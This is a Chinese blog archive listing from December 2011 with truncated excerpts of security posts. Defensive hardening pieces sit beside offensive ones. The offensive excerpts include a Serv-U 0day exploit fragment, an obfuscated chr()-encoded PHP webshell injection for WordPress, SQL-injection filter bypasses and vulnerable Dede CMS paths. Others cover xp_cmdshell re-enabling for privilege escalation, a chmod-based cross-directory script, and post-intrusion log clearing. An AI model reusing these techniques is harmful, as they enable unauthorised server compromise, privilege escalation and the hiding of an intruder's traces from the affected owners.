2011年12月_7禧

转载 JavaScript连接数据库

ps:本以为可以借此方法连接限制了IP连接的数据库。因为目标WEB只能执行静态页面。伟大的客户端脚本语言代码： var conn = new ActiveXObject("ADODB.Connection"); //var sqlstr="Provider=SQLOLEDB.1; Data Source=localhost; User ID=sa;Password=;

2011-12-31 17:48:44 804

转载安全服务反思：把渗透测试做成服务

原文：http://www.room702.cn/index.php/archives/527http://www.room702.cn/index.php/archives/529http://www.room702.cn/index.php/archives/5310、也许都是瞎扯！　　　　首先，我这个标题自然就是认为，现在国内的渗透测试已经做的不像服务了，可谓乱象丛生

2011-12-31 17:45:51 1217

转载思科路由器安全加固方案（南方电网预实施方案）

http://www.youxia.org/2011/08/Route-JiaGu.html一、控制层面主要安全威协与应对原则网络设备的控制层面的实质还是运行的一个操作系统，既然是一个操作系统，那么，其它操作系统可能遇到的安全威胁网络设备都有可能遇到；总结起来有如下几个方面：1、系统自身的缺陷：操作系统作为一个复杂系统，不论在发布之前多么仔细的进行测试，总会有缺陷产生的

2011-12-31 17:39:08 1651 1

原创 Linux系统防火墙防止DOS和DDOS攻击

用Linux系统防火墙功能抵御网络攻击虚拟主机服务商在运营过程中可能会受到黑客攻击，常见的攻击方式有SYN，DDOS等。通过更换IP，查找被攻击的站点可能避开攻击，但是中断服务的时间比较长。比较彻底的解决方法是添置硬件防火墙。不过，硬件防火墙价格比较昂贵。可以考虑利用Linux系统本身提供的防火墙功能来防御。1. 抵御SYNSYN攻击是利用TCP/IP协议3次握手的原理，发送大量的建立

2011-12-31 17:19:27 656

转载 Nginx简单防御CC攻击

Nginx是一款轻量级的Web服务器，由俄罗斯的程序设计师Igor Sysoev所开发，最初供俄国大型的入口网站及搜寻引Rambler使用。其特点是占有内存少，并发能力强，事实上Nginx的并发能力确实在同类型的网站服务器中表现较好。Nginx虽然可以比Apache处理更大的连接数，但是HTTP GET FLOOD针对的不仅仅是WEB服务器，还有数据库服务器。大量HTTP请求产生了大量的数据

2011-12-31 17:17:02 803

原创 serv-u最新通杀所有版本0day

转载注明：http://hi.baidu.com/r00ts/blog/item/5c673305d801222ce92488c8.html?timeStamp=1318420470453EXP: body,td,th {font-size: 12px;}-->Function httpopen(neirong,fangshi,dizhi,refer,c

2011-12-31 17:16:37 728

转载 shell突破web防火墙访问

把shell文件后缀改为图片格式，上传到网站目录下，然后新建个php或asp 文件，例如：asp ，内容写为shell.asp .访问此文件即可正常操作。

2011-12-31 16:56:28 451

原创解决Fckeditor删除所有上传页面如何上传

首先,你得确定下Fckeditor的版本。 /FCKeditor/editor/dialog/fck_about.html其次,你确定下以下几个上传页面是否真的被删除了呢? /FCKeditor/editor/filemanager/browser/default/browser.html /FCKeditor/editor/fi

2011-12-31 15:03:12 761

转载 SQLMAP使用方法

作者：落泪红尘给大家介绍的SqlMap是一个开放源码的渗透测试工具，它可以自动探测和利用SQL注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎，为最终渗透测试人员提供很多猥琐的功能，可以拖库，可以访问底层的文件系统，还可以通过带外连接执行操作系统上的命令。使用方法：需要安装python,但是呢不能安装最新版本的python3.2.2只能安装2.6-3.0这些

2011-12-31 14:58:27 759

原创 Dede CMS All Versions SQL

[#] Vulnerable Files : /list.php?id=[sql] /members.php?id=[sql] /book.php?id=[sql]

2011-12-31 14:55:49 490

原创 sqlmap简单中文说明

这个东西，是mickey整理的，不多说了，尊重一下原作者，转载注明mickey整理就好了更新svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-devsqlmap.py -u “http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1″ -v 1 –

2011-12-30 23:50:59 551

转载 CDN获取真实IP

现在很多网站用了cdn技术，在做一些测试的时候，想获取其服务器真实IP地址就有点困难，不知道现在还有其他什么好的方法呢，整理了下，目前知道如下两种：1：拿CDN服务器找出真实IPcache_peer 1.1.1.1 parent 80 0 no-query originservercache_peer_domain 1.1.1.1 www.kanwangluo.com2：

2011-12-30 23:45:14 624

原创 IT 缩略语

Selected acronyms used in the Guide to SSL VPNs are defined below.AD ■ Active DirectoryAH ■ Authentication HeaderAPI ■ Application Programming InterfaceARP ■ Address Resolution Pr

2011-12-30 11:30:26 589

原创 Kivlad--Android上的二进制文件的反编译工具

Kivlad是Android上的Dalvik的二进制文件的反编译器，一个高度可定制的基于Web的导航界面。不同于现有的Dalvik反编译，它的工作原理本机Dalvik字节码，而不是转换为Java字节码，这意味着更高质量的结果。也不像其他工具有一个静态的GUI的，它需要在Dalvik的二进制文件，并给你的HTML可以主题和扩展，你的愿望。这是一个很好的alpha版本。Kivlad与Ruby 1.

2011-12-30 10:46:31 1134

转载打造LINUX系统安全

1、LILO安全设置 vi /etc/lilo.conf.anaconda //修改LILO文件===============================================……restricted //加入这行password=111111 //加入这行并设置密码为1111

2011-12-27 10:57:16 549

原创 FOR语句提权中基础语法

for /r d:\wwwroot\web\ %i in (*.asp) do @echo %i >>c:\windows\temp\1.txt——这个是把 f:\vip 目录所有asp文件列出来，然后保存在c:\windows\temp\下的1.txt===================================================================

2011-12-26 14:12:10 588

原创 Nginx配置文件详解

2011-12-26 14:11:09 475

原创 Linux命令行下WEP密码破解(通用，也可非BT平台)

看到网络上很多教程,虽说都是面向我们这种”菜鸟”,可往往几条操作了事,没有说明,这里我结合自己的实际情况写一点步骤,不是完全原创,但尽量把一些可能遇到的情况说明到,希望对大家有帮助。首先是平台选择的问题,网上推荐都是基于LINUX的BT3/4.BT系列很强大,但我感觉有些误解，而且有为USB网卡做广告嫌疑一是BT太强大,不仅仅是无线破解这么一点点功能,蓝牙,网络等很多安全工具,只要肯研

2011-12-26 14:09:43 1334

原创入侵后完美清理日志的总结

入侵后完美清理日志的总结.当我们进入一台主机不是只有系统一个家伙在看守我们在做的一些操作,当然还有另外一些服务.所以千万不的掉以轻心~介绍了很多点,相信大家已经收藏了。一:开始 – 程序 – 管理工具 – 计算机管理 – 系统工具 -事件查看器，然后清除日志。二: Windows2000的日志文件通常有应用程序日志，安全日志、系统日志、DNS服务器日志、FTP日志、WWW日

2011-12-26 11:56:27 549

原创基于php+Mysql的SQL Injection 攻击技术

关于php+Mysql的注入国内能看到php+Mysql注入的文章可能比较少，但是如果关注各种WEB程序的漏洞，就可以发现，其实这些漏洞的文章其实就是一个例子。不过由于国内研究PHP的人比研究ASP的人实在少太多，所以，可能没有注意，况且PHP的安全性比ASP高很多，导致很多人不想跨越这个门槛。尽管如此，在PHP站点日益增多的今天，SQL注入仍是最有效最麻烦的一种攻击方式，有效是因为至

2011-12-26 11:52:59 593

原创 wordpress 拿webshell

别的地方看到的留着以后备用进入后台后台-外观-编辑,随便找一个文件插入以下代码 fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(3

2011-12-26 11:42:53 804

原创如何在php中修补XSS漏洞

文章作者：Langy译文作者：riusksk在PHP中修补XSS漏洞，我们可以使用三个PHP函数。这些函数主要用于清除HTML标志，这样就没办法注入代码了。使用更多的函数是htmlspecialchars() ，它可以将所有的"<"与">"符号转换成"<" 与"&gt；"。其它可供选择的函数还有htmlentities(), 它可以用相应的字符实体（e

2011-12-20 15:14:26 715

原创突破ARP防火墙嗅探

自从arp防火墙出来后，好像大家遇到装了arp防火墙的服务器就没办法了。其实arp防火墙的原理就是不停的向网关发arp包刷新arp表，如果我们单独用一个发包工具，发包的速度比arp防火墙的速度快，告诉网关我是被欺骗的主机ip和mac，由于我发包的速度比arp防火墙快，网关应对我的包要多一些，所以就把我当成被欺骗的主机了。所以,就要利用工具对网关快速发包.输入网关的IP和MA

2011-12-20 11:41:38 715

原创如何绕过防注入

防注入绕过必用11招1、运用编码技术绕过如URLEncode编码，ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)2、通过空格绕过如两个空格代替一个空格，用Tab代替空格等，或者删除所有空格，如or'' swords'' =‘swords'

2011-12-20 09:01:05 499

原创 . NET自动找可写目录

很好用！.NET 提权必备工具！ScanWrtieableprotected void Page_Load(object sender, EventArgs e){}int cresults;protected void ScanRights(DirectoryInfo cdir){try{if (Int32.Pars

2011-12-19 11:13:32 419

转载服务器溢出提权攻击的解决办法

在频频恶意攻击用户、系统漏洞层出不穷的今天，作为网络治理员、系统治理员虽然在服务器的安全上都下了不少功夫，诸如及时打上系统安全补丁、进行一些常规的安全配置，但有时仍不安全。因此必须恶意用户入侵之前，通过一些系列安全设置，来将入侵者们挡在“安全门”之外，下面就将最简单、最有效的防(Overflow)溢出、本地提供权限攻击类的解决办法给大家分享。　　一、如何防止溢出类攻击　　1、尽

2011-12-19 10:33:38 1120

原创 ubuntu安装openssh

安装openssh-server后，就可以通过加密连接远程访问ubuntu，这里推荐使用Putty访问ubuntu。 PuTTY 是一套免费的 SSH / Telnet 程序，它可以连接上支持 SSH Telnet 联机的站台，并且可自动取得对方的系统指纹码 (Fingerprint)。建立联机以后，所有的通讯内容都是以加密的方式传输，因此你再也不用害怕使用 Telnet 在 Interne

2011-12-16 09:14:27 618

原创 Access SQL注入参考

2008-05-29 22:48Access SQL注入参考版本 0.2.1(最近更新 10/10/2007)恶魔傻蛋译描述SQL查询及注释注释符Access中没有专门的注释符号.因此"/*", "--"和"#"都没法使用.但是可以使用空字符"NULL"(%0

2011-12-15 11:49:23 560

原创利用XSS Shell进行XSS测试

转自：涅磐小鸟0x01 XSS Shell简介 XSS Shell一个windows环境下的XSS攻击平台。下载地址为：http://www.portcullis-security.com/tools/free/XSSShell039.zip利用XSS Shell，攻击者可以轻松攻击存在XSS漏洞的网站的用户。目前可以实施的攻击包括但不限于：

2011-12-14 08:51:29 573

原创 phpMyAdmin phpmyadmin.css.php完全路径泄露漏洞

发布日期：2011-10-17更新日期：2011-10-18受影响系统：phpMyAdmin phpMyAdmin 3.4.5描述：--------------------------------------------------------------------------------phpMyAdmin是一个用PHP编写的，可以通过 web 方式控制和操作 My

2011-12-13 14:51:14 1159

原创浅谈如何进行网络安全评估

周连兵摘要：随着网络技术的发展，网络信息系统逐渐深入到各行各业，网络安全也成为人们关注的话题，一个组织的信息系统经常面临内部和外部威胁的风险，如果你没有一定的黑客技术的经验与知识，很难充分保护你的系统。安全评估就是利用大量安全行业经验和漏洞扫描的最先进技术，从内部和外部两个角度，对一个组织的信息系统进行全面的评估。该文主要通过论述怎样进行安全评估，使广大网管、网络安全技术人员及用户

2011-12-09 17:36:20 4540

原创 rsync命令实现：多服务器镜像同步

实现功能：当用户在本地客户端某目录内建立、修改、删除目录或文件、修改目录或文件的属性，只要执行相同的shell脚本，rsync就会自动找出有改动或删除的数据，将其传送到服务器上，使服务器端某目录内的数据跟本地客户端某目录内的数据保持一致。方式一：一、服务器端（例：10.0.0.1*）：1、创建用户和组groupadd www -g 48useradd -u

2011-12-06 14:11:41 496

原创内网渗透一些命令收集整理

内网渗透一些命令收集整理=====一些收集信息的命令=====@查询本机的一些情况ipconfig /all@查询存在关系的机器Net view@查询有几个域nei view /damin@查看 testdomain域中的计算机列表net view /domain:testdomain@查询域内的组

2011-12-06 11:54:57 1094

原创 fckeditor上传.变_突破

用到记录有很多已经修补过的fckeditor 我们上传 x.asp;y.jpg的时候通常会变成 x_asp;y.jpg 让我们的马失效利用二次上传可以生成 x(2).asp;y.jpg 可以突破有些时候打了补丁的让我们还是无法突破通常我们在editor/FCKeditor/editor/filemanager/browser/default/browser.html?Ty

2011-12-06 11:47:19 445

原创 sql 2005 sa权限提权

首先看看xp_cmdshell存在不,不存在的话先恢复下。Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;然后Exec master.dbo.xp_cmdshell 'net user' 持行命令。下面

2011-12-06 11:42:23 1238

原创 linux不提权跨目录访问的代码

linux权限多设的比较松的其实，但有的虚拟机还是不能跨目录访问的。在提不了权的情况下，试试如下代码吧。运气好的话说不定就跨过去了。代码如下：$path = stripslashes($_GET['path']);$ok = chmod ($path , 0777);if ($ok == true)echo CHMOD OK , Permission edi

2011-12-06 09:42:20 678

原创如何判段删掉，恢复 xp_cmdshell

一、xp_cmdshell的删除及恢复1、判断xp_cmdshell是否存在(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name ='xp_cmdshell')返回结果为1就ok2、恢复xp_cmdshell的方法删除扩展存储过过程xp_cmdshell的语句ex

2011-12-06 09:39:54 396

转载 Serv-U FTP Jail Break（越权遍历目录、下载任意文件）

[*]----------------------------------------------------[*]Serv-U FTP Server Jail Break 0dayDiscovered By KingcopeYear 2011[*]----------------------------------------------------[*]/*通过构造

2011-12-06 09:37:14 668

Nikto是一款Web安全扫描工具，可以扫描指定主机的web类型，主机名，特定目录，cookie，特定CGI漏洞，XSS漏洞，SQL注入漏洞等，非常强大滴说。。。[email protected]:~# cd /pentest/web/nikto/[email protected]:/pentest/web/nikto# lsdocs nikto.conf nikto.pl plugins tem

2011-12-06 09:31:23 2010

原创 whatweb WEB指纹探测工具

http://www.morningstarsecurity.com/research/whatwebDownloadwhatweb-0.4.7.tar.gzLatest Version0.4.7, 5th April 2011LicenseGPLv2Authorurbanadventurer aka Andrew Horton from Security-

2011-12-05 16:19:16 7157

青云服务器安全设置器V2011正式版

空空如也